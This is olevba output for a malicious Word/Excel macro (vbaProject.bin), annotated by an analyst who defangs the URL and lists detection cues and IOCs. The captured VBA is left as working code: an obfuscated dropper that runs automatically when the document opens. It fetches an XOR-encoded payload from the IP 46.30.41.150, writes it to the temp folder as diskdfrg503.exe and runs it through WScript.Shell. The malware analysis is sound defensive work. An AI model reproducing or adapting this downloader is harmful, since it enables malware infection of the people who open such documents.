- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI-B-V vbaProject.bin
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: vbaProject.bin
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: auto-executing entry point (olevba lists Auto_Open under AutoExec).
- ' Its only statement calls naecHWEtHHtbM, the download-and-run routine defined
- ' later in this module, so that routine starts as soon as this handler fires.
- Sub Auto_Open()
- naecHWEtHHtbM
- End Sub
- ' Analyst note: repeating-key XOR decoder.
- '   hfgudrRChN - data string to transform, one character at a time
- '   NmLpvABWZN - key string; its characters are reused cyclically
- ' Returns a string in which each data character has been XORed with the key
- ' character at the current key position. XOR is symmetric, so the same routine
- ' both encodes and decodes. The only call visible in this module passes the
- ' downloaded response body and a key built from string fragments.
- Function oUZDCYSBz(hfgudrRChN, NmLpvABWZN)
- Dim DlaQdYZnrwVM
- ' Output accumulator.
- DlaQdYZnrwVM = ""
- Dim qGVuetJ
- ' Key index; "2 - 1" is an obfuscated 1 (VBA strings are 1-based).
- qGVuetJ = 2 - 1
- Dim TiGjIdL
- TiGjIdL = 1
- For TiGjIdL = 1 To Len(hfgudrRChN)
- ' Current key character and current data character (both undeclared Variants).
- uXelSqetWAbrIT = Mid(NmLpvABWZN, qGVuetJ, 1)
- ZTpFUkV = Mid(hfgudrRChN, TiGjIdL, 1)
- DlaQdYZnrwVM = DlaQdYZnrwVM & Chr(Asc(ZTpFUkV) Xor Asc(uXelSqetWAbrIT))
- qGVuetJ = qGVuetJ + 1
- ' Wrap the key index back to the first character once the key is exhausted.
- If Len(NmLpvABWZN) < qGVuetJ Then qGVuetJ = 1
- Next
- oUZDCYSBz = DlaQdYZnrwVM
- End Function
- ' Analyst note: converts a byte buffer into a VBA string, one byte per character.
- '   zryqVCxyWrr - the data to convert; the only caller in this module passes the
- '                 WinHttp responseBody.
- ' Returns the concatenation of all converted characters in their original order.
- ' The three nested accumulators only stage the output in chunks; they do not
- ' alter the data. Presumably this avoids repeated appends to one long string
- ' (not confirmable from this listing).
- Function pbAvnHvCOcZ(zryqVCxyWrr)
- Dim ZPoIibDoJR, JbFyoPNFoRxR, OqzPlKr, XukMzXujgUSsPa, JfAoyNSuxGLcqPL, PXUgFeibPlGgI
- Dim ygaoXnJ
- ' ZPoIibDoJR: 1-based byte position; JbFyoPNFoRxR / OqzPlKr: chunk counters.
- ZPoIibDoJR = 1
- JbFyoPNFoRxR = 2 - 1
- OqzPlKr = 1
- ' Total length in bytes (LenB), not characters.
- ygaoXnJ = LenB(zryqVCxyWrr)
- Do While ZPoIibDoJR <= ygaoXnJ
- ' Take one byte (MidB/AscB) and turn it into a single character (Chr).
- tbdWcuFNGrQl = Chr(AscB(MidB(zryqVCxyWrr, ZPoIibDoJR, 1)))
- PXUgFeibPlGgI = PXUgFeibPlGgI & tbdWcuFNGrQl
- ZPoIibDoJR = ZPoIibDoJR + 1
- OqzPlKr = OqzPlKr + 1
- ' First-level chunk limit (re-assigned on every iteration).
- BxvasUlR = 300
- If OqzPlKr > BxvasUlR Then
- ' Flush the small buffer into the middle buffer.
- JfAoyNSuxGLcqPL = JfAoyNSuxGLcqPL & PXUgFeibPlGgI
- PXUgFeibPlGgI = ""
- ' Obfuscated constant: &H3EF + 2892 - &HF3A = 1007 + 2892 - 3898 = 1.
- OqzPlKr = (&H3EF + 2892 - &HF3A)
- JbFyoPNFoRxR = JbFyoPNFoRxR + 1
- ' Obfuscated constant: 19 + 31 * (32 + 1142 - 1169) = 19 + 31 * 5 = 174.
- If JbFyoPNFoRxR > 19 + 31 * (&H20 + 1142 - &H491) Then
- ' Flush the middle buffer into the outer buffer.
- XukMzXujgUSsPa = XukMzXujgUSsPa & JfAoyNSuxGLcqPL
- JfAoyNSuxGLcqPL = ""
- JbFyoPNFoRxR = 1
- End If
- End If
- Loop
- ' Join outer, middle and remaining small buffer to rebuild the full string.
- pbAvnHvCOcZ = XukMzXujgUSsPa & JfAoyNSuxGLcqPL & PXUgFeibPlGgI
- End Function
- ' Analyst note: downloader/dropper routine, reached from all three auto-exec
- ' handlers in this module. In order, it:
- '   1. rebuilds COM ProgIDs, a file name and a URL from string fragments,
- '   2. issues a synchronous HTTP GET to the host olevba reports as an IOC,
- '   3. on HTTP 200, XOR-decodes the response body and writes it to the temp folder,
- '   4. runs the written file through a shell object.
- ' Detection and triage pointers from the code itself: an Office process creating
- ' a WinHttp request object to a bare IPv4 address, a new .exe appearing in the
- ' user's temp folder, and that file being launched from the Office process.
- ' URLs in these comments are defanged; the code lines are left exactly as captured.
- Sub naecHWEtHHtbM()
- Dim ltFbwRt As String
- ' Empty filler string, concatenated below only to break up literals.
- LYMDaxRkb = ""
- ' = "rip"
- tLnHKfZPzbhEI = "r" + "i" + "p"
- ' "hehcGpPQydpill" with the junk marker "hcGpPQydpi" removed = "hell"
- igWILjykMi = "hehcGpPQydpi" + "l" + "l"
- fsGnVrg = Replace(igWILjykMi, "hcGpPQydpi", "")
- ' Resolves to the ProgID "WScript.Shell" (used for the final Run call).
- HXNXvJiLqktuo = LYMDaxRkb + LYMDaxRkb + "WSc" + LYMDaxRkb + tLnHKfZPzbhEI + "t.S" + fsGnVrg + LYMDaxRkb
- ' = ".exe"
- SxvWbDoY = "" + "" + ".exe"
- ' Dropped file name: "diskdfrg503.exe".
- jthCBDaaJRDpv = "diskdfrg503" & SxvWbDoY
- ' The next four assignments resolve to the ProgID "Scripting.FileSystemObject".
- turiqEfvgMad = "Scripting.Fil" + "e" + "Sy" + "s"
- ZdLrJNCA = "e" + "c" + "t"
- vomJUBHkqH = "te" + "mO" + "b" + "j"
- dDNGqIfQPl = turiqEfvgMad + vomJUBHkqH + ZdLrJNCA
- Set eUMvBdooBUflklU = CreateObject(dDNGqIfQPl)
- ' GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant; two
- ' backslashes are appended, so the path carries a doubled separator.
- UlNkpxXUjx = eUMvBdooBUflklU.GetSpecialFolder(2) & "\" + "\"
- ' Full drop path: <temp folder>\\diskdfrg503.exe
- lzUiTQJPens = UlNkpxXUjx & jthCBDaaJRDpv
- ' 2 + 30 + 1142 - 1169 = 5; stored in a String variable, so it becomes "5".
- ltFbwRt = (2 + 30 + 1142 - 1169)
- LCNEmUMrVtZeK = "" + ".1"
- iwDokBl = "WinHt" + "t" + "p" + "."
- ' Resolves to the ProgID "WinHttp.WinHttpRequest.5.1".
- eYMbfyaRHJCv = iwDokBl + "WinHttp" + "Requ" + "est" + "." + ltFbwRt + LCNEmUMrVtZeK
- Set cnzZdwdShJh = CreateObject(eYMbfyaRHJCv, "")
- ' Same junk-marker trick as above: resolves to the scheme "http://".
- zesOpyaWimNkqH = "hcGpPQydpihtthcGpPQydpip://"
- XrTdGZXkSzDR = Replace(zesOpyaWimNkqH, "hcGpPQydpi", "")
- ' Download URL (defanged): hxxp://46.30.41[.]150/bb.typ
- ' The host matches the IPv4 IOC in the olevba summary table.
- DlaQdYZnrwVM = XrTdGZXkSzDR + "46.30.41" + ".150/" + "bb.ty" + "p"
- ' Method string resolves to "GET".
- ymgtVbmtxZ = "E" + "T"
- BfJmrmZbnp = "G"
- ' Third argument False = synchronous request; send blocks until it completes.
- cnzZdwdShJh.Open "" + BfJmrmZbnp + ymgtVbmtxZ, DlaQdYZnrwVM, False
- cnzZdwdShJh.send
- ' Remove any earlier copy of the dropped file before writing a new one.
- If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
- eUMvBdooBUflklU.DeleteFile (lzUiTQJPens)
- End If
- ' 100 + 100 = 200: only a successful HTTP response is written to disk.
- If cnzZdwdShJh.Status = 100 + 100 Then
- xUmBoWIKxzpt = True
- ' Second argument True = overwrite an existing file.
- Set fEHnLYbclJADSdF = eUMvBdooBUflklU.CreateTextFile(lzUiTQJPens, xUmBoWIKxzpt)
- YBlkuQGmcR = cnzZdwdShJh.responseBody
- ' Body bytes -> string (pbAvnHvCOcZ), then repeating-key XOR (oUZDCYSBz) with
- ' the key "nkiOaWsg". The served content is therefore XOR-encoded on the wire
- ' and only takes its final form on disk. Presumably this keeps the transfer
- ' from looking like an executable in transit; that intent is an inference.
- fEHnLYbclJADSdF.Write oUZDCYSBz(pbAvnHvCOcZ(YBlkuQGmcR), "nkiO" + "aWs" + "g")
- fEHnLYbclJADSdF.Close
- End If
- ' Runs the file if it exists on disk, via the "WScript.Shell" ProgID built above.
- If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
- qBLjFDPZAWx = lzUiTQJPens
- CreateObject(HXNXvJiLqktuo).Run qBLjFDPZAWx
- End If
- End Sub
- ' Analyst note: Word auto-exec handler (olevba: "Runs when the Word document is
- ' opened"). It forwards to Auto_Open, which calls the downloader routine.
- Sub AutoOpen()
- ' Both assignments build the same string, "WOW Nuke", which is never read in
- ' this listing. It has no effect on behaviour but is distinctive, so it may
- ' serve as a string to match on when hunting for related samples.
- LxuuCbj = "WOW " + "N" + "u" + "k" + "e"
- LxuuCbj = "WOW" + " Nuk" + "e"
- Auto_Open
- End Sub
- ' Analyst note: Excel auto-exec handler (olevba: "Runs when the Excel Workbook is
- ' opened"). With AutoOpen and Auto_Open also defined, the same macro code is set
- ' up to start in either a Word or an Excel host; all three end in Auto_Open.
- Sub Workbook_Open()
- Auto_Open
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | 46.30.41.150 | IPv4 address (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+